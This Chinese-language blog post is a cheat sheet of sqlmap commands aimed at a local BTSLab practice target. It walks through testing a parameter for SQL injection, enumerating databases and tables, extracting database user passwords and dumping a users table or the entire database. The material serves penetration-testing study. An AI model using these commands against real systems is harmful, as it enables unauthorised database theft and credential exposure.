sqlmap基本命令
1、查看版本 sqlmap.py --version 2、查看帮助 sqlmap.py --help 3、测试url是否有注入的可能 sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 4、不询问用户,使用所有默认的配置,可能会触发WAF的告警 sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --batch 5、暴库(列出所有的数据库) sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --dbs 6、web当前使用的数据库 sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --current-db 7、当前使用数据库的用户 sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --current-user 8、列出数据库所有的用户 sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --users 9、列出数据库的用户和密码 sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --passwords 10、列出数据中所有的表 sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --tables -D bts 11、列出数据库bts特定表users的结构,所有字段 sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --columns -D bts -T users 12、脱裤 数据库bts,表users,字段username和password sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --dump -D bts -T users -C "username,password" 13、脱裤,整个数据库 sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --dump-all
作者:null-npe 出处:https://www.cnblogs.com/npe 由于作者个人水平有限,如果文中有什么错误,欢迎指出。以免更多的人被误导。 |